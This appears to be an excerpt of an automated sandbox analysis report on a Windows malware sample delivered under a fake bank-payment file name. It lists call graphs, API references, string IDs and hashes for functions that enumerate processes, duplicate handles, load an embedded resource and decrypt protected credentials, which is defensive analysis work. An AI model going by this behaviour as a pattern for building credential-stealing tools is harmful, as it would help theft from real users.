40470->40521 40471 437612 memcpy 40471->40442 40473->40445 40474->40390 40475->40409 40476->40407 40477->40390 40478->40414 40479->40424 40480->40421 40481->40414 40482->40414 40484 41bc3b 101 API calls 40483->40484 40485 41f1b4 40484->40485 40486 41edad 86 API calls 40485->40486 40493 41f282 40485->40493 40487 41f1cb 40486->40487 40488 41f1f5 memcmp 40487->40488 40489 41f20e 40487->40489 40487->40493 40488->40489 40490 41f21b memcmp 40489->40490 40489->40493 40491 41f326 40490->40491 40494 41f23d 40490->40494 40492 41ee6b 86 API calls 40491->40492 40491->40493 40492->40493 40493->40433 40494->40491 40495 41f28e memcmp 40494->40495 40497 41c8df 56 API calls 40494->40497 40495->40491 40496 41f2a9 40495->40496 40496->40491 40499 41f308 40496->40499 40500 41f2d8 40496->40500 40498 41f269 40497->40498 40498->40491 40501 41f287 40498->40501 40502 41f27a 40498->40502 40499->40491 40506 4446ce 11 API calls 40499->40506 40503 41ee6b 86 API calls 40500->40503 40501->40495 40504 41ee6b 86 API calls 40502->40504 40505 41f2e0 40503->40505 40504->40493 40507 41b1ca memset 40505->40507 40506->40491 40507->40493 40508->40433 40509->40433 40510->40433 40511->40427 40512->40428 40513->40445 40514->40442 40515->40445 40516->40445 40517->40445 40518->40445 40519->40445 40520->40463 40521->40446 40522->40459 40523->40471 40524 441939 40549 441247 40524->40549 40527 4418ea 40528 441897 40530 442bd4 40528->40530 40531 4418e2 40528->40531 40530->40527 40553 441409 memset 40530->40553 40531->40527 40552 4414a9 12 API calls 40531->40552 40534 4308a4 40535 4308e4 40534->40535 40536 4308bc 40534->40536 40559 42b896 memset 40535->40559 40554 42c0c8 148 API calls 40536->40554 40539 4308d3 40541 4308e8 40539->40541 40542 4308d8 40539->40542 40540 430931 40540->40528 40556 42b896 memset 40541->40556 40555 4169a7 11 API calls 40542->40555 40545 4308f3 40557 42bbbe memcpy memcpy memcpy memset memcpy 40545->40557 40547 4308ff 40558 415c23 memcpy 40547->40558 40550 42b63e 14 API calls 40549->40550 40551 441259 40550->40551 40551->40527 40551->40528 40551->40534 40552->40527 40553->40530 40554->40539 40555->40535 40556->40545 40557->40547 40558->40535 40559->40540 40560 41493c EnumResourceNamesW

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DDAD
                                                                                                                                                                                                                                            • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                                                                                                                                                                                                                          • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                                                                                                                                                                            • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                                                                                                            • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                                                                                                          • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                                                                                                                                                                          • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DEC5
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DED8
                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                                                                                                                                                                                                                          • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                                                                                                                                                                                                                          • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0040DF5F
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 0040DFB2
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                                                                                                                                                                                                                          • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                                                                                                                                                                                                                          • API String ID: 708747863-3398334509
                                                                                                                                                                                                                                          • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                                                                          • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                                                                                                                                                                                                                          Function 00413D4C Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 635 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 638 413f00-413f11 Process32NextW 635->638 639 413da5-413ded OpenProcess 638->639 640 413f17-413f24 CloseHandle 638->640 641 413eb0-413eb5 639->641 642 413df3-413e26 memset call 413f27 639->642 641->638 644 413eb7-413ebd 641->644 650 413e79-413e9d call 413959 call 413ca4 642->650 651 413e28-413e35 642->651 646 413ec8-413eda call 4099f4 644->646 647 413ebf-413ec6 free 644->647 648 413edb-413ee2 646->648 647->648 653 413ee4 648->653 654 413ee7-413efe 648->654 662 413ea2-413eae CloseHandle 650->662 655 413e61-413e68 651->655 656 413e37-413e44 GetModuleHandleW 651->656 653->654 654->638 655->650 659 413e6a-413e77 QueryFullProcessImageNameW 655->659 656->655 658 413e46-413e5c GetProcAddress 656->658 658->655 659->650 662->641
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                                          • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                                          • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                                          • QueryFullProcessImageNameW.KERNELBASE(00000000,00000000,?,00000104,00000000,?), ref: 00413E77
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Handle$CloseProcessProcess32freememset$AddressCreateFirstFullImageModuleNameNextOpenProcQuerySnapshotToolhelp32
                                                                                                                                                                                                                                          • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                                          • API String ID: 3536422406-1740548384
                                                                                                                                                                                                                                          • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                                                                          • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                                                                                                                                                                                                                          Function 0040B58D Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 60COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                          control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                                                                                                                                          • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                                          • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                                          • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                                          • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                                          • String ID: AE$BIN
                                                                                                                                                                                                                                          • API String ID: 1668488027-3931574542
                                                                                                                                                                                                                                          • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                                                                          • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                                          Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                                                                                                            • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                                                                                                                                                                                                                            • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                                                                                                                                                                                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                                                                          • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                                                                                                                                                                                                                          • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00418803
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1355100292-0
                                                                                                                                                                                                                                          • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                          • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                                                                                                                                                                                                                          Function 00404423 Relevance: 4.6, APIs: 3, Instructions: 51libraryencryptionloaderCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                          • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 767404330-0
                                                                                                                                                                                                                                          • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                          • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                                          Function 0040AE51 Relevance: 3.0, APIs: 2, Instructions: 39fileCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                                          • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FileFind$FirstNext
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1690352074-0
                                                                                                                                                                                                                                          • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                          • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                                          Function 00418981 Relevance: 3.0, APIs: 2, Instructions: 28COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                                          • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: InfoSystemmemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3558857096-0
                                                                                                                                                                                                                                          • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                                                                          • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                                          Function 00406E8F Relevance: 2.9, APIs: 2, Instructions: 415COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                            • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                          • free.MSVCRT ref: 00407082
                                                                                                                                                                                                                                            • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000002.00000002.3013608350.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000002.00000002.3013608350.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_Payment_Volksbank_EUR36550-Bestellung -4500673541.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: free$memcpymemset
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2037443186-0
                                                                                                                                                                                                                                          • Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                                                                                          • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55
                                                                                                                                                                                                                                          Function 0044553B Relevance: 44.5, APIs: 23, Strings: 2, Instructions: 758COMMON
                                                                                                                                                                                                                                          Download Yara Rule

                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                          • Not Executed
